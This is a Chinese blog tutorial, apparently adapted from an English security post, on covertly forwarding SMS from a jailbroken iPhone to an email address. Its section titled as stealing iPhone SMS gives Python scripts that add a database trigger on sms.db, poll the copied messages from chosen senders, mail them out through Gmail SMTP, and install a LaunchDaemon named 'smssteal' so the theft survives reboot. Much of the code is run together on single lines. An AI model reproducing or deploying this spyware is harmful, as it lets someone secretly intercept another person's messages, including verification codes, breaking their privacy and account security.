iPhone上将短信内容发送到指定邮箱的方法 |
您所在的位置:网站首页 › 苹果转短信发送 › iPhone上将短信内容发送到指定邮箱的方法 |
iPhone上将短信内容发送到指定邮箱的方法
|
实验环境
1.iOS 5.1.1越狱设备
2. 通过cydia安装 python 2.7.3
3. 通过cydia安装SQLite 3.x
4. 通过Cydia安装adv-cmds
一、使用python脚本读取sms.db数据库中存储的短信内容
iOS 短信存储在系统的/var/mobile/Library/SMS/文件夹中,包含3个主要文件:
(1)sms.db,标准的SQLite 3格式,存储主要的短信数据
(2)sms.db-shm, "Associate File"
(3)sms.db-wal. “Write Ahead Log"
danimato-iPod:/var/mobile/Library/SMS root# file sms.dbsms.db: SQLite 3.x database danimato-iPod:/var/mobile/Library/SMS root# file sms.db-shmsms.db-shm: data /var/mobile/Library/SMS root# file sms.db-walsms.db-wal: data 我们使用SQLite Database Browser打开sms.db,并执行查询语句,会发现如下错误
于是,我们可以使用strings命令查看一下这个文件里面的内容(strings命令在初步分析文件时很有用)
danimato-iPod:/var/mobile/Library/SMS root# strings sms.db >smsdb 打开smsdb文件,可以看到短信message表结构,如下所示CREATE TABLE message (ROWID INTEGER PRIMARY KEY AUTOINCREMENT, address TEXT, date INTEGER, text TEXT, flags INTEGER, replace INTEGER, svc_center TEXT, group_id INTEGER,association_id INTEGER, height INTEGER, UIFlags INTEGER, version INTEGER, subject TEXT,country TEXT, headers BLOB, recipients BLOB, read INTEGER, madrid_attributedBody BLOB,madrid_handle TEXT, madrid_version INTEGER, madrid_guid TEXT, madrid_type INTEGER,madrid_roomname TEXT, madrid_service TEXT, madrid_account TEXT, madrid_account_guid TEXT,madrid_flags INTEGER, madrid_attachmentInfo BLOB, madrid_url TEXT, madrid_error INTEGER,is_madrid INTEGER, madrid_date_read INTEGER, madrid_date_delivered INTEGER) 我们可以使用python脚本smsDBQuer.py(注意:原脚本不支持中文,需要改变一下)来查询一下该表中的数据,如下所示输出未读短信数量及内容#!/usr/bin/python# smstest.py# by KrishnaChaitanya Yarramsetty# www.foundstone.com import sqlite3 as liteimport sysimport smtplib smspath="/var/mobile/Library/SMS/" con = lite.connect(smspath+'sms.db')msg="" with con:con.row_factory = lite.Rowcur = con.cursor()cur.execute('SELECT text,adderss from message where read=0 order by date desc')rows = cur.fetchall()#data = cur.fetchone()counter=0print "Latest displayed first"for row in rows:counter+=1print "Unread Message: %s" % counter textencode = row["text"].encode('gb2312')print "Text: %s" % textencode addressdecode = row["address"].encode('gb2312')print "Address: %s" % addressdecode#print "Text: %s" % row["text"]msg=row["text"] 我们将smsDBQuery.py脚本上传到设备/var/mobile/Library/SMS/目录下danimato-iPod:/var/mobile/Library/SMS root# chmod +x smsDBQuery.py danimato-iPod:/var/mobile/Library/SMS root# python smsDBQuery.py 运行结果如下:
二、窃取iPhone短信信息
接下来演示如何将iPhone上短信信息转发到指定邮箱中
1. smsCreateTrigger.py脚本 #!/usr/bin/python# smstrigger.py# by KrishnaChaitanya Yarramsetty# www.foundstone.com import sqlite3 as liteimport sys smspath="/var/mobile/Library/SMS/" con = lite.connect(smspath + 'sms.db') with con:con.row_factory = lite.Rowcur = con.cursor() #cur.execute('DROP TABLE message2;')#cur.execute('DROP TRIGGER insert_newest_message_email;')cur.execute('CREATE TABLE message2 (ROWID INTEGER PRIMARY KEY, address TEXT, date INTEGER, text TEXT, emailsent INTEGER);')cur.execute('CREATE TRIGGER insert_newest_message_email AFTER INSERT ON message WHEN new.ROWID >= 0 BEGIN INSERT INTO "message2" select ROWID,address,date,text,0 from message where ROWID=new.ROWID; END;')print 'Done.' 我们将smsCreateTrigger.py上传到设备/var/mobile/Library/SMS/目录下,修改执行权限,并运行danimato-iPod:/var/mobile/Library/SMS root# chmod +x smsCreateTrigger.py danimato-iPod:/var/mobile/Library/SMS root# python smsCreateTrigger.py Done. 该脚本的功能是当message表有记录增加时,将新增记录插入新创建的message2表中 2.smsWatcher.py 脚本#!/usr/bin/python# smsread.py # by KrishnaChaitanya Yarramsetty# www.foundstone.com import sqlite3 as liteimport sysimport smtplibimport time def sendEmail(msg):fromaddr = '[email protected]'toaddrs = '[email protected]' # Credentials username = 'abc'password = '****' # The actual mail send snippetserver = smtplib.SMTP('smtp.gmail.com:587')server.starttls()server.login(username,password)server.sendmail(fromaddr, toaddrs, msg)server.quit() #Set path for SMS directory#smsfromaddress will be used a filter. filter restricts only to those sms that have FROM address as mentioned below. FROM addresses can be multiple as well.#"address" is the column name. smspath="/var/mobile/Library/SMS/"smsfromaddress=('AXARWINF','6564567890',) #Poll for any new messages waiting to be delivered in an infinite loop with 60 second interval. #though it is not one of the efficient methods, considering the purpose of the script it was taken for granted while 1==1:#Connect to the database and read sms from 'message2' table.con = lite.connect(smspath+'sms.db')with con:con.row_factory = lite.Rowcur = con.cursor()cur2 = con.cursor()cur.execute('SELECT * from message2 where emailsent=0 and address=?',smsfromaddress)rows = cur.fetchall()for row in rows:msg='Address is ' + row["address"] + ' Text Message is ' + row["text"].encode('gb2312') sendEmail(msg)ROWID = (row["ROWID"],)cur2.execute('UPDATE message2 SET emailsent=1 WHERE ROWID=?', ROWID)con.commit()time.sleep(60) 该脚本的功能是将messge2表中指定短信发送到指定邮箱中,我们需要修改脚本中用来接收SMS短信的邮箱相关信息fromaddr = '[email protected]' #发件人地址toaddrs = '[email protected]' #收件人地址 username = '[email protected]' #发件人邮箱名password = '****'#发件人邮箱密码 server = smtplib.SMTP('smtp.gmail.com:587')#发件邮件服务器 smsfromaddress=('AXARWINF','6564567890',)#指定你想窃取的短信来自哪里 上传smsWatcher.py到设备/var/mobile/Library/SMS/目录下,修改执行权限,并在后台运行danimato-iPod:/var/mobile/Library/SMS root# chmod +x smsWatcher.py danimato-iPod:/var/mobile/Library/SMS root# python smsWatcher.py &[1] 4819 当运行上面两个脚本的iPhone有新的短信信息时,短信内容就会发送到你指定的邮箱中去了 3.设置脚本开机自动启动 上述脚本如果要常驻系统,开机自动启动,需要做以下设置,首先在/var/mobile/Library/SMS目录下编写一个bash脚本启动smsWatcher.pydanimato-iPod:/var/mobile/Library/SMS root# cat smsWatcher#!/bin/bashpython /var/mobile/Library/SMS/smsWatcher.py danimato-iPod:/var/mobile/Library/SMS root# cat smsWatcherdanimato-iPod:/var/mobile/Library/SMS root# chmod +x smsWatcher 然后在/System/Library/LaunchDaemons目录下编写一个plist配置文件,配置开机自动启动danimato-iPod:/System/Library/LaunchDaemons root# cat com.dani.smssteal.plist DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN""http://www.apple.com/DTDs/PropertyList-1.0.dtd">Labelcom.dani.smsstealProgram/var/mobile/Library/SMS/smsWatcherRunAtLoad danimato-iPod:/System/Library/LaunchDaemons root# launchctl load/System/Library/LaunchDaemons/com.dani.smssteal.plist 有iPhone的朋友可以试一试,欢迎交流 参考资料: http://blog.opensecurityresearch.com/2013/02/forwarding-sms-to-email-on-jailbroken.html |
【本文地址】
今日新闻 |
推荐新闻 |